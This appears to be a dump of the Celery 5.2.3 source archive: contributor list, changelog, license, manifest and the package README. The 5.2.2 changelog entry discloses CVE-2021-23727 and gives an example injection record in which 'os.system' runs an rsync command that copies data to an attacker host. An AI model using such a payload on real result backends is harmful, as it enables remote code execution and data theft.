celery-5.2.3/CONTRIBUTORS.txt
Every contribution to Celery is as important to us as every coin in the money bin is to Scrooge McDuck. The first commit to the Celery codebase was made on Fri Apr 24 13:30:00 2009 +0200, and the project has since been improved by many contributors. Everyone who has ever contributed to Celery should be in this list, but under a recent policy change contributors must add themselves here rather than be added by others, so the list is currently incomplete while everyone adds their own name. The list of authors added before the policy change can be found in docs/AUTHORS.txt. -- Contributor offers to license certain software (a “Contribution” or multiple “Contributions”) to Celery, and Celery agrees to accept said Contributions, under the terms of the BSD open source license. Contributor understands and agrees that Celery shall have the irrevocable and perpetual right to make and distribute copies of any Contribution, as well as to create and distribute collective works and derivative works of any Contribution, under the BSD License. Contributors ------------ Asif Saif Uddin, 2016/08/30 Ask Solem, 2012/06/07 Sean O'Connor, 2012/06/07 Patrick Altman, 2012/06/07 Chris St. Pierre, 2012/06/07 Jeff Terrace, 2012/06/07 Mark Lavin, 2012/06/07 Jesper Noehr, 2012/06/07 Brad Jasper, 2012/06/07 Juan Catalano, 2012/06/07 Luke Zapart, 2012/06/07 Roger Hu, 2012/06/07 Honza Král, 2012/06/07 Aaron Elliot Ross, 2012/06/07 Alec Clowes, 2012/06/07 Daniel Watkins, 2012/06/07 Timo Sugliani, 2012/06/07 Yury V.
Zaytsev, 2012/06/7 Marcin Kuźmiński, 2012/06/07 Norman Richards, 2012/06/07 Kevin Tran, 2012/06/07 David Arthur, 2012/06/07 Bryan Berg, 2012/06/07 Mikhail Korobov, 2012/06/07 Jerzy Kozera, 2012/06/07 Ben Firshman, 2012/06/07 Jannis Leidel, 2012/06/07 Chris Rose, 2012/06/07 Julien Poissonnier, 2012/06/07 Łukasz Oleś, 2012/06/07 David Strauss, 2012/06/07 Chris Streeter, 2012/06/07 Thomas Johansson, 2012/06/07 Ales Zoulek, 2012/06/07 Clay Gerrard, 2012/06/07 Matt Williamson, 2012/06/07 Travis Swicegood, 2012/06/07 Jeff Balogh, 2012/06/07 Harm Verhagen, 2012/06/07 Wes Winham, 2012/06/07 David Cramer, 2012/06/07 Steeve Morin, 2012/06/07 Mher Movsisyan, 2012/06/08 Chris Peplin, 2012/06/07 Florian Apolloner, 2012/06/07 Juarez Bochi, 2012/06/07 Christopher Angove, 2012/06/07 Jason Pellerin, 2012/06/07 Miguel Hernandez Martos, 2012/06/07 Neil Chintomby, 2012/06/07 Mauro Rocco, 2012/06/07 Ionut Turturica, 2012/06/07 Adriano Petrich, 2012/06/07 Michael Elsdörfer, 2012/06/07 Kornelijus Survila, 2012/06/07 Stefán Kjartansson, 2012/06/07 Keith Perkins, 2012/06/07 Flavio Percoco, 2012/06/07 Wes Turner, 2012/06/07 Vitaly Babiy, 2012/06/07 Tayfun Sen, 2012/06/08 Gert Van Gool, 2012/06/08 Akira Matsuzaki, 2012/06/08 Simon Josi, 2012/06/08 Sam Cooke, 2012/06/08 Frederic Junod, 2012/06/08 Roberto Gaiser, 2012/06/08 Piotr Sikora, 2012/06/08 Chris Adams, 2012/06/08 Branko Čibej, 2012/06/08 Vladimir Kryachko, 2012/06/08 Remy Noel 2012/06/08 Jude Nagurney, 2012/06/09 Jonatan Heyman, 2012/06/10 David Miller 2012/06/11 Matthew Morrison, 2012/06/11 Leo Dirac, 2012/06/11 Mark Thurman, 2012/06/11 Dimitrios Kouzis-Loukas, 2012/06/13 Steven Skoczen, 2012/06/17 Loren Abrams, 2012/06/19 Eran Rundstein, 2012/06/24 John Watson, 2012/06/27 Matt Long, 2012/07/04 David Markey, 2012/07/05 Jared Biel, 2012/07/05 Jed Smith, 2012/07/08 Łukasz Langa, 2012/07/10 Rinat Shigapov, 2012/07/20 Hynek Schlawack, 2012/07/23 Paul McMillan, 2012/07/26 Mitar, 2012/07/28 Adam DePue, 2012/08/22 Thomas Meson, 2012/08/28 Daniel Lundin, 2012/08/30 Alexey Zatelepin, 2012/09/18 Sundar Raman, 2012/09/24 Henri Colas, 2012/11/16 Thomas Grainger, 2012/11/29 Marius Gedminas, 2012/11/29 Christoph Krybus, 2013/01/07 Jun Sakai, 2013/01/16 Vlad Frolov, 2013/01/23 Milen Pavlov, 2013/03/08 Pär Wieslander, 2013/03/20 Theo Spears, 2013/03/28 Romuald Brunet, 2013/03/29 Aaron Harnly, 2013/04/04 Peter Brook, 2013/05/09 Muneyuki Noguchi, 2013/04/24 Stas Rudakou, 2013/05/29 Dong Weiming, 2013/06/27 Oleg Anashkin, 2013/06/27 Ross Lawley, 2013/07/05 Alain Masiero, 2013/08/07 Adrien Guinet, 2013/08/14 Christopher Lee, 2013/08/29 Alexander Smirnov, 2013/08/30 Matt Robenolt, 2013/08/31 Jameel Al-Aziz, 2013/10/04 Fazleev Maksim, 2013/10/08 Ian A Wilson, 2013/10/18 Daniel M Taub, 2013/10/22 Matt Wise, 2013/11/06 Michael Robellard, 2013/11/07 Vsevolod Kulaga, 2013/11/16 Ionel Cristian Mărieș, 2013/12/09 Константин Подшумок, 2013/12/16 Antoine Legrand, 2014/01/09 Pepijn de Vos, 2014/01/15 Dan McGee, 2014/01/27 Paul Kilgo, 2014/01/28 Môshe van der Sterre, 2014/01/31 Martin Davidsson, 2014/02/08 Chris Clark, 2014/02/20 Matthew Duggan, 2014/04/10 Brian Bouterse, 2014/04/10 Dmitry Malinovsky, 2014/04/28 Luke Pomfrey, 2014/05/06 Alexey Kotlyarov, 2014/05/16 Ross Deane, 2014/07/11 Tadej Janež, 2014/08/08 Akexander Koshelev, 2014/08/19 Davide Quarta, 2014/08/19 John Whitlock, 2014/08/19 Konstantinos Koukopoulos, 2014/08/24 Albert Yee Wang, 2014/08/29 Andrea Rabbaglietti, 2014/10/02 Joe Jevnik, 2014/10/22 Nathan Van Gheem, 2014/10/28 Gino Ledesma, 2014/10/28 Thomas French, 2014/11/10 
Michael Permana, 2014/11/6 William King, 2014/11/21 Bert Vanderbauwhede, 2014/12/18 John Anderson, 2014/12/27 Luke Burden, 2015/01/24 Mickaël Penhard, 2015/02/15 Mark Parncutt, 2015/02/16 Samuel Jaillet, 2015/03/24 Ilya Georgievsky, 2015/03/31 Fatih Sucu, 2015/04/17 James Pulec, 2015/04/19 Alexander Lebedev, 2015/04/25 Frantisek Holop, 2015/05/21 Feanil Patel, 2015/05/21 Jocelyn Delalande, 2015/06/03 Justin Patrin, 2015/08/06 Juan Rossi, 2015/08/10 Piotr Maślanka, 2015/08/24 Gerald Manipon, 2015/10/19 Krzysztof Bujniewicz, 2015/10/21 Sukrit Khera, 2015/10/26 Dave Smith, 2015/10/27 Dennis Brakhane, 2015/10/30 Chris Harris, 2015/11/27 Valentyn Klindukh, 2016/01/15 Wayne Chang, 2016/01/15 Mike Attwood, 2016/01/22 David Harrigan, 2016/02/01 Ahmet Demir, 2016/02/27 Maxime Verger, 2016/02/29 Alexander Oblovatniy, 2016/03/10 Komu Wairagu, 2016/04/03 Joe Sanford, 2016/04/11 Takeshi Kanemoto, 2016/04/22 Arthur Vuillard, 2016/04/22 Colin McIntosh, 2016/04/26 Jeremy Zafran, 2016/05/17 Anand Reddy Pandikunta, 2016/06/18 Adriano Martins de Jesus, 2016/06/22 Kevin Richardson, 2016/06/29 Andrew Stewart, 2016/07/04 Xin Li, 2016/08/03 Alli Witheford, 2016/09/29 Alan Justino da Silva, 2016/10/14 Marat Sharafutdinov, 2016/11/04 Viktor Holmqvist, 2016/12/02 Rick Wargo, 2016/12/02 zhengxiaowai, 2016/12/07 Michael Howitz, 2016/12/08 Andreas Pelme, 2016/12/13 Mike Chen, 2016/12/20 Alejandro Pernin, 2016/12/23 Yuval Shalev, 2016/12/27 Morgan Doocy, 2017/01/02 Arcadiy Ivanov, 2017/01/08 Ryan Hiebert, 2017/01/20 Jianjian Yu, 2017/04/09 Brian May, 2017/04/10 Dmytro Petruk, 2017/04/12 Joey Wilhelm, 2017/04/12 Yoichi Nakayama, 2017/04/25 Simon Schmidt, 2017/05/19 Anthony Lukach, 2017/05/23 Samuel Dion-Girardeau, 2017/05/29 Aydin Sen, 2017/06/14 Vinod Chandru, 2017/07/11 Preston Moore, 2017/06/18 Nicolas Mota, 2017/08/10 David Davis, 2017/08/11 Martial Pageau, 2017/08/16 Sammie S. Taunton, 2017/08/17 Kxrr, 2017/08/18 Mads Jensen, 2017/08/20 Markus Kaiserswerth, 2017/08/30 Andrew Wong, 2017/09/07 Arpan Shah, 2017/09/12 Tobias 'rixx' Kunze, 2017/08/20 Mikhail Wolfson, 2017/12/11 Matt Davis, 2017/12/13 Alex Garel, 2018/01/04 Régis Behmo 2018/01/20 Igor Kasianov, 2018/01/20 Derek Harland, 2018/02/15 Chris Mitchell, 2018/02/27 Josue Balandrano Coronel, 2018/05/24 Federico Bond, 2018/06/20 Tom Booth, 2018/07/06 Axel haustant, 2018/08/14 Bruno Alla, 2018/09/27 Artem Vasilyev, 2018/11/24 Victor Mireyev, 2018/12/13 Florian Chardin, 2018/10/23 Shady Rafehi, 2019/02/20 Fabio Todaro, 2019/06/13 Shashank Parekh, 2019/07/11 Arel Cordero, 2019/08/29 Kyle Johnson, 2019/09/23 Dipankar Achinta, 2019/10/24 Sardorbek Imomaliev, 2020/01/24 Maksym Shalenyi, 2020/07/30 Frazer McLean, 2020/09/29 Henrik Bruåsdal, 2020/11/29 Tom Wojcik, 2021/01/24 Ruaridh Williamson, 2021/03/09 Garry Lawrence, 2021/06/19 Patrick Zhang, 2017/08/19 Konstantin Kochin, 2021/07/11 kronion, 2021/08/26 Gabor Boros, 2021/11/09 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640756913.0 celery-5.2.3/Changelog.rst0000664000175000017500000001704700000000000015327 0ustar00asifasif00000000000000.. _changelog: ================ Change history ================ This document contains change notes for bugfix & new features in the & 5.2.x series, please see :ref:`whatsnew-5.2` for an overview of what's new in Celery 5.2. .. _version-5.2.3: 5.2.3 ===== :release-date: 2021-12-29 12:00 P.M UTC+6:00 :release-by: Asif Saif Uddin - Allow redis >= 4.0.2. - Upgrade minimum required pymongo version to 3.11.1. - tested pypy3.8 beta (#6998). 
- Split Signature.__or__ into subclasses' __or__ (#7135).
- Prevent duplication in event loop on Consumer restart.
- Restrict setuptools>=59.1.1,<59.7.0.
- Kombu bumped to v5.2.3.
- py-amqp bumped to v5.0.9.
- Some docs & CI improvements.

.. _version-5.2.2:

5.2.2
=====
:release-date: 2021-12-26 16:30 UTC+2:00
:release-by: Omer Katz

- Various documentation fixes.
- Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

  When a task fails, the failure information is serialized in the backend.
  In some cases, the exception class is only importable from the consumer's
  code base. In this case, we reconstruct the exception class so that we can
  re-raise the error on the process which queried the task's result. This was
  introduced in #4836.

  If the recreated exception type isn't an exception, this is a security issue.
  Without the condition included in this patch, an attacker could inject a
  remote code execution instruction such as
  ``os.system("rsync /data attacker@192.168.56.100:~/data")``
  by setting the task's result to a failure in the result backend, using the
  ``os`` module and its ``system`` function as the exception type and the
  payload ``rsync /data attacker@192.168.56.100:~/data`` as the exception
  arguments, like so:

  .. code-block:: python

      {
          "exc_module": "os",
          "exc_type": "system",
          "exc_message": "rsync /data attacker@192.168.56.100:~/data"
      }

  According to my analysis, this vulnerability can only be exploited if the
  producer delayed a task which runs long enough for the attacker to change
  the result mid-flight, and the producer has polled for the task's result.
  The attacker would also have to gain access to the result backend.

  The severity of this security vulnerability is low, but we still recommend
  upgrading. A minimal sketch of the guarding type check appears at the end
  of this changelog.

.. _version-5.2.1:

5.2.1
=====
:release-date: 2021-11-16 8.55 P.M UTC+6:00
:release-by: Asif Saif Uddin

- Fix rstrip usage on bytes instance in ProxyLogger.
- Pass logfile to ExecStop in celery.service example systemd file.
- fix: reduce latency of AsyncResult.get under gevent (#7052)
- Limit redis version: <4.0.0.
- Bump min kombu version to 5.2.2.
- Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.
- Remove dependency to case (#7077).
- fix: task expiration is timezone aware if needed (#7065).
- Initial testing of pypy-3.8 beta to CI.
- Docs, CI & tests cleanups.

.. _version-5.2.0:

5.2.0
=====
:release-date: 2021-11-08 7.15 A.M UTC+6:00
:release-by: Asif Saif Uddin

- Prevent from subscribing to empty channels (#7040)
- fix register_task method.
- Fire task failure signal on final reject (#6980)
- Limit pymongo version: <3.12.1 (#7041)
- Bump min kombu version to 5.2.1

.. _version-5.2.0rc2:

5.2.0rc2
========
:release-date: 2021-11-02 1.54 P.M UTC+3:00
:release-by: Naomi Elstein

- Bump Python 3.10.0 to rc2.
- [pre-commit.ci] pre-commit autoupdate (#6972).
- autopep8.
- Prevent worker to send expired revoked items upon hello command (#6975).
- docs: clarify the 'keeping results' section (#6979).
- Update deprecated task module removal in 5.0 documentation (#6981).
- [pre-commit.ci] pre-commit autoupdate.
- try python 3.10 GA.
- mention python 3.10 on readme.
- Documenting the default consumer_timeout value for rabbitmq >= 3.8.15.
- Azure blockblob backend parametrized connection/read timeouts (#6978).
- Add as_uri method to azure block blob backend.
- Add possibility to override backend implementation with celeryconfig (#6879).
- [pre-commit.ci] pre-commit autoupdate.
- try to fix deprecation warning.
- [pre-commit.ci] pre-commit autoupdate.
- not needed anymore.
- not needed anymore.
- not used anymore.
- add github discussions forum.

.. _version-5.2.0rc1:

5.2.0rc1
========
:release-date: 2021-09-26 4.04 P.M UTC+3:00
:release-by: Omer Katz

- Kill all workers when main process exits in prefork model (#6942).
- test kombu 5.2.0rc1 (#6947).
- try moto 2.2.x (#6948).
- Prepared Hacker News Post on Release Action.
- update setup with python 3.7 as minimum.
- update kombu on setupcfg.
- Added note about automatic killing all child processes of worker after its termination.
- [pre-commit.ci] pre-commit autoupdate.
- Move importskip before greenlet import (#6956).
- amqp: send expiration field to broker if requested by user (#6957).
- Single line drift warning.
- canvas: fix kwargs argument to prevent recursion (#6810) (#6959).
- Allow to enable Events with app.conf mechanism.
- Warn when expiration date is in the past.
- Add the Framework :: Celery trove classifier.
- Give indication whether the task is replacing another (#6916).
- Make setup.py executable.
- Bump version: 5.2.0b3 → 5.2.0rc1.

.. _version-5.2.0b3:

5.2.0b3
=======
:release-date: 2021-09-02 8.38 P.M UTC+3:00
:release-by: Omer Katz

- Add args to LOG_RECEIVED (fixes #6885) (#6898).
- Terminate job implementation for eventlet concurrency backend (#6917).
- Add cleanup implementation to filesystem backend (#6919).
- [pre-commit.ci] pre-commit autoupdate (#69).
- Add before_start hook (fixes #4110) (#6923).
- Restart consumer if connection drops (#6930).
- Remove outdated optimization documentation (#6933).
- added https verification check functionality in arangodb backend (#6800).
- Drop Python 3.6 support.
- update supported python versions on readme.
- [pre-commit.ci] pre-commit autoupdate (#6935).
- Remove appveyor configuration since we migrated to GA.
- pyupgrade is now set to upgrade code to 3.7.
- Drop exclude statement since we no longer test with pypy-3.6.
- 3.10 is not GA so it's not supported yet.
- Celery 5.1 or earlier supports Python 3.6.
- Fix linting error.
- fix: Pass a Context when chaining fail results (#6899).
- Bump version: 5.2.0b2 → 5.2.0b3.

.. _version-5.2.0b2:

5.2.0b2
=======
:release-date: 2021-08-17 5.35 P.M UTC+3:00
:release-by: Omer Katz

- Test windows on py3.10rc1 and pypy3.7 (#6868).
- Route chord_unlock task to the same queue as chord body (#6896).
- Add message properties to app.tasks.Context (#6818).
- handle already converted LogLevel and JSON (#6915).
- 5.2 is codenamed dawn-chorus.
- Bump version: 5.2.0b1 → 5.2.0b2.

.. _version-5.2.0b1:

5.2.0b1
=======
:release-date: 2021-08-11 5.42 P.M UTC+3:00
:release-by: Omer Katz

- Add Python 3.10 support (#6807).
- Fix docstring for Signal.send to match code (#6835).
- No blank line in log output (#6838).
- Chords get body_type independently to handle cases where body.type does not exist (#6847).
- Fix #6844 by allowing safe queries via app.inspect().active() (#6849).
- Fix multithreaded backend usage (#6851).
- Fix Open Collective donate button (#6848).
- Fix setting worker concurrency option after signal (#6853).
- Make ResultSet.on_ready promise hold a weakref to self (#6784).
- Update configuration.rst.
- Discard jobs on flush if synack isn't enabled (#6863).
- Bump click version to 8.0 (#6861).
- Amend IRC network link to Libera (#6837).
- Import celery lazily in pytest plugin and unignore flake8 F821, "undefined name '...'" (#6872).
- Fix inspect --json output to return valid json without --quiet.
- Remove celery.task references in modules, docs (#6869).
- The Consul backend must correctly associate requests and responses (#6823).
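
For reference, the essence of the CVE-2021-23727 fix described under 5.2.2 above is that a
reconstructed exception type must actually be an exception class before it is instantiated
and re-raised. The sketch below only illustrates that idea; it is not the code shipped in
5.2.2, and ``rebuild_exception`` and its arguments are hypothetical names:

.. code-block:: python

    from importlib import import_module

    from celery.exceptions import SecurityError


    def rebuild_exception(exc_module, exc_type, exc_message):
        """Recreate an exception instance from serialized failure metadata."""
        cls = getattr(import_module(exc_module), exc_type)
        # Refuse anything that isn't an exception class, e.g. ``os.system``,
        # so the attacker-controlled callable is never invoked.
        if not (isinstance(cls, type) and issubclass(cls, BaseException)):
            raise SecurityError(
                f'{exc_module}.{exc_type} is not an exception class')
        return cls(exc_message)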
././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/LICENSE0000664000175000017500000000510700000000000013705 0ustar00asifasif00000000000000Copyright (c) 2015-2016 Ask Solem & contributors. All rights reserved. Copyright (c) 2012-2014 GoPivotal, Inc. All rights reserved. Copyright (c) 2009, 2010, 2011, 2012 Ask Solem, and individual contributors. All rights reserved. Celery is licensed under The BSD License (3 Clause, also known as the new BSD license). The license is an OSI approved Open Source license and is GPL-compatible(1). The license text can also be found here: http://www.opensource.org/licenses/BSD-3-Clause License ======= Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of Ask Solem, nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL Ask Solem OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. Documentation License ===================== The documentation portion of Celery (the rendered contents of the "docs" directory of a software distribution or checkout) is supplied under the "Creative Commons Attribution-ShareAlike 4.0 International" (CC BY-SA 4.0) License as described by https://creativecommons.org/licenses/by-sa/4.0/ Footnotes ========= (1) A GPL-compatible license makes it possible to combine Celery with other software that is released under the GPL, it does not mean that we're distributing Celery under the GPL license. The BSD license, unlike the GPL, let you distribute a modified version without making your changes open source. 
././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/MANIFEST.in0000664000175000017500000000130500000000000014432 0ustar00asifasif00000000000000include CONTRIBUTORS.txt include Changelog.rst include LICENSE include README.rst include MANIFEST.in include TODO include setup.cfg include setup.py recursive-include t *.py *.rst recursive-include docs * recursive-include extra/bash-completion * recursive-include extra/centos * recursive-include extra/generic-init.d * recursive-include extra/macOS * recursive-include extra/supervisord * recursive-include extra/systemd * recursive-include extra/zsh-completion * recursive-include examples * recursive-include requirements *.txt *.rst recursive-include celery/utils/static *.png recursive-exclude docs/_build * recursive-exclude * __pycache__ recursive-exclude * *.py[co] recursive-exclude * .*.sw[a-z] ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.8637578 celery-5.2.3/PKG-INFO0000664000175000017500000004261400000000000014001 0ustar00asifasif00000000000000Metadata-Version: 2.1 Name: celery Version: 5.2.3 Summary: Distributed Task Queue. Home-page: http://celeryproject.org Author: Ask Solem Author-email: auvipy@gmail.com License: BSD Project-URL: Documentation, https://docs.celeryproject.org/en/latest/index.html Project-URL: Changelog, https://docs.celeryproject.org/en/stable/changelog.html Project-URL: Code, https://github.com/celery/celery Project-URL: Tracker, https://github.com/celery/celery/issues Project-URL: Funding, https://opencollective.com/celery Keywords: task job queue distributed messaging actor Platform: any Classifier: Development Status :: 5 - Production/Stable Classifier: License :: OSI Approved :: BSD License Classifier: Topic :: System :: Distributed Computing Classifier: Topic :: Software Development :: Object Brokering Classifier: Framework :: Celery Classifier: Programming Language :: Python Classifier: Programming Language :: Python :: 3 :: Only Classifier: Programming Language :: Python :: 3 Classifier: Programming Language :: Python :: 3.7 Classifier: Programming Language :: Python :: 3.8 Classifier: Programming Language :: Python :: 3.9 Classifier: Programming Language :: Python :: 3.10 Classifier: Programming Language :: Python :: Implementation :: CPython Classifier: Programming Language :: Python :: Implementation :: PyPy Classifier: Operating System :: OS Independent Requires-Python: >=3.7, Provides-Extra: dynamodb Provides-Extra: consul Provides-Extra: auth Provides-Extra: sqlalchemy Provides-Extra: memcache Provides-Extra: pyro Provides-Extra: yaml Provides-Extra: pytest Provides-Extra: zookeeper Provides-Extra: mongodb Provides-Extra: azureblockblob Provides-Extra: sqs Provides-Extra: cosmosdbsql Provides-Extra: django Provides-Extra: brotli Provides-Extra: eventlet Provides-Extra: librabbitmq Provides-Extra: couchdb Provides-Extra: arangodb Provides-Extra: tblib Provides-Extra: redis Provides-Extra: slmq Provides-Extra: msgpack Provides-Extra: elasticsearch Provides-Extra: cassandra Provides-Extra: gevent Provides-Extra: zstd Provides-Extra: pymemcache Provides-Extra: couchbase Provides-Extra: s3 Provides-Extra: solar License-File: LICENSE .. 
image:: http://docs.celeryproject.org/en/latest/_images/celery-banner-small.png |build-status| |coverage| |license| |wheel| |pyversion| |pyimp| |ocbackerbadge| |ocsponsorbadge| :Version: 5.2.3 (dawn-chorus) :Web: https://docs.celeryproject.org/en/stable/index.html :Download: https://pypi.org/project/celery/ :Source: https://github.com/celery/celery/ :Keywords: task, queue, job, async, rabbitmq, amqp, redis, python, distributed, actors Donations ========= This project relies on your generous donations. If you are using Celery to create a commercial product, please consider becoming our `backer`_ or our `sponsor`_ to ensure Celery's future. .. _`backer`: https://opencollective.com/celery#backer .. _`sponsor`: https://opencollective.com/celery#sponsor For enterprise ============== Available as part of the Tidelift Subscription. The maintainers of ``celery`` and thousands of other packages are working with Tidelift to deliver commercial support and maintenance for the open source dependencies you use to build your applications. Save time, reduce risk, and improve code health, while paying the maintainers of the exact dependencies you use. `Learn more. `_ What's a Task Queue? ==================== Task queues are used as a mechanism to distribute work across threads or machines. A task queue's input is a unit of work called a task; dedicated worker processes then constantly monitor the queue for new work to perform. Celery communicates via messages, usually using a broker to mediate between clients and workers. To initiate a task, a client puts a message on the queue, and the broker then delivers the message to a worker. A Celery system can consist of multiple workers and brokers, allowing for high availability and horizontal scaling. Celery is written in Python, but the protocol can be implemented in any language. In addition to Python there's node-celery_ for Node.js, a `PHP client`_, `gocelery`_ for golang, and rusty-celery_ for Rust. Language interoperability can also be achieved by using webhooks in such a way that the client enqueues a URL to be requested by a worker. .. _node-celery: https://github.com/mher/node-celery .. _`PHP client`: https://github.com/gjedeer/celery-php .. _`gocelery`: https://github.com/gocelery/gocelery .. _rusty-celery: https://github.com/rusty-celery/rusty-celery What do I need? =============== Celery version 5.2.0 runs on: - Python (3.7, 3.8, 3.9, 3.10) - PyPy3.7 (7.3.7+) This is the version of Celery that supports Python 3.7 or newer. If you're running an older version of Python, you need to be running an older version of Celery: - Python 2.6: Celery series 3.1 or earlier. - Python 2.5: Celery series 3.0 or earlier. - Python 2.4: Celery series 2.2 or earlier. - Python 2.7: Celery 4.x series. - Python 3.6: Celery 5.1 or earlier. Celery is a project with minimal funding, so we don't support Microsoft Windows. Please don't open any issues related to that platform. *Celery* is usually used with a message broker to send and receive messages. The RabbitMQ and Redis transports are feature complete, but there's also experimental support for a myriad of other solutions, including using SQLite for local development. *Celery* can run on a single machine, on multiple machines, or even across datacenters.
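
As a concrete illustration of the client/worker flow described under "What's a Task Queue?" above, here is a minimal sketch. It assumes a Redis broker running on localhost and a worker started with ``celery -A tasks worker``; the module name ``tasks`` and the ``add`` task are made-up examples:

.. code-block:: python

    # tasks.py (hypothetical module name)
    from celery import Celery

    app = Celery('tasks',
                 broker='redis://localhost:6379/0',
                 backend='redis://localhost:6379/0')

    @app.task
    def add(x, y):
        return x + y

    if __name__ == '__main__':
        # Client side: .delay() only enqueues a message; a worker process
        # executes the task and stores the return value in the backend.
        result = add.delay(2, 2)
        print(result.get(timeout=10))  # -> 4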
Get Started =========== If this is the first time you're trying to use Celery, or you're new to Celery v5.2.0 coming from previous versions then you should read our getting started tutorials: - `First steps with Celery`_ Tutorial teaching you the bare minimum needed to get started with Celery. - `Next steps`_ A more complete overview, showing more features. .. _`First steps with Celery`: http://docs.celeryproject.org/en/latest/getting-started/first-steps-with-celery.html .. _`Next steps`: http://docs.celeryproject.org/en/latest/getting-started/next-steps.html You can also get started with Celery by using a hosted broker transport CloudAMQP. The largest hosting provider of RabbitMQ is a proud sponsor of Celery. Celery is... ============= - **Simple** Celery is easy to use and maintain, and does *not need configuration files*. It has an active, friendly community you can talk to for support, like at our `mailing-list`_, or the IRC channel. Here's one of the simplest applications you can make: .. code-block:: python from celery import Celery app = Celery('hello', broker='amqp://guest@localhost//') @app.task def hello(): return 'hello world' - **Highly Available** Workers and clients will automatically retry in the event of connection loss or failure, and some brokers support HA in way of *Primary/Primary* or *Primary/Replica* replication. - **Fast** A single Celery process can process millions of tasks a minute, with sub-millisecond round-trip latency (using RabbitMQ, py-librabbitmq, and optimized settings). - **Flexible** Almost every part of *Celery* can be extended or used on its own, Custom pool implementations, serializers, compression schemes, logging, schedulers, consumers, producers, broker transports, and much more. It supports... ================ - **Message Transports** - RabbitMQ_, Redis_, Amazon SQS - **Concurrency** - Prefork, Eventlet_, gevent_, single threaded (``solo``) - **Result Stores** - AMQP, Redis - memcached - SQLAlchemy, Django ORM - Apache Cassandra, IronCache, Elasticsearch - **Serialization** - *pickle*, *json*, *yaml*, *msgpack*. - *zlib*, *bzip2* compression. - Cryptographic message signing. .. _`Eventlet`: http://eventlet.net/ .. _`gevent`: http://gevent.org/ .. _RabbitMQ: https://rabbitmq.com .. _Redis: https://redis.io .. _SQLAlchemy: http://sqlalchemy.org Framework Integration ===================== Celery is easy to integrate with web frameworks, some of which even have integration packages: +--------------------+------------------------+ | `Django`_ | not needed | +--------------------+------------------------+ | `Pyramid`_ | `pyramid_celery`_ | +--------------------+------------------------+ | `Pylons`_ | `celery-pylons`_ | +--------------------+------------------------+ | `Flask`_ | not needed | +--------------------+------------------------+ | `web2py`_ | `web2py-celery`_ | +--------------------+------------------------+ | `Tornado`_ | `tornado-celery`_ | +--------------------+------------------------+ The integration packages aren't strictly necessary, but they can make development easier, and sometimes they add important hooks like closing database connections at ``fork``. .. _`Django`: https://djangoproject.com/ .. _`Pylons`: http://pylonsproject.org/ .. _`Flask`: http://flask.pocoo.org/ .. _`web2py`: http://web2py.com/ .. _`Bottle`: https://bottlepy.org/ .. _`Pyramid`: http://docs.pylonsproject.org/en/latest/docs/pyramid.html .. _`pyramid_celery`: https://pypi.org/project/pyramid_celery/ .. _`celery-pylons`: https://pypi.org/project/celery-pylons/ .. 
_`web2py-celery`: https://code.google.com/p/web2py-celery/ .. _`Tornado`: http://www.tornadoweb.org/ .. _`tornado-celery`: https://github.com/mher/tornado-celery/ .. _celery-documentation: Documentation ============= The `latest documentation`_ is hosted at Read The Docs, containing user guides, tutorials, and an API reference. 最新的中文文档托管在 https://www.celerycn.io/ 中,包含用户指南、教程、API接口等。 .. _`latest documentation`: http://docs.celeryproject.org/en/latest/ .. _celery-installation: Installation ============ You can install Celery either via the Python Package Index (PyPI) or from source. To install using ``pip``: :: $ pip install -U Celery .. _bundles: Bundles ------- Celery also defines a group of bundles that can be used to install Celery and the dependencies for a given feature. You can specify these in your requirements or on the ``pip`` command-line by using brackets. Multiple bundles can be specified by separating them by commas. :: $ pip install "celery[amqp]" $ pip install "celery[amqp,redis,auth,msgpack]" The following bundles are available: Serializers ~~~~~~~~~~~ :``celery[auth]``: for using the ``auth`` security serializer. :``celery[msgpack]``: for using the msgpack serializer. :``celery[yaml]``: for using the yaml serializer. Concurrency ~~~~~~~~~~~ :``celery[eventlet]``: for using the ``eventlet`` pool. :``celery[gevent]``: for using the ``gevent`` pool. Transports and Backends ~~~~~~~~~~~~~~~~~~~~~~~ :``celery[amqp]``: for using the RabbitMQ amqp python library. :``celery[redis]``: for using Redis as a message transport or as a result backend. :``celery[sqs]``: for using Amazon SQS as a message transport. :``celery[tblib``]: for using the ``task_remote_tracebacks`` feature. :``celery[memcache]``: for using Memcached as a result backend (using ``pylibmc``) :``celery[pymemcache]``: for using Memcached as a result backend (pure-Python implementation). :``celery[cassandra]``: for using Apache Cassandra as a result backend with DataStax driver. :``celery[azureblockblob]``: for using Azure Storage as a result backend (using ``azure-storage``) :``celery[s3]``: for using S3 Storage as a result backend. :``celery[couchbase]``: for using Couchbase as a result backend. :``celery[arangodb]``: for using ArangoDB as a result backend. :``celery[elasticsearch]``: for using Elasticsearch as a result backend. :``celery[riak]``: for using Riak as a result backend. :``celery[cosmosdbsql]``: for using Azure Cosmos DB as a result 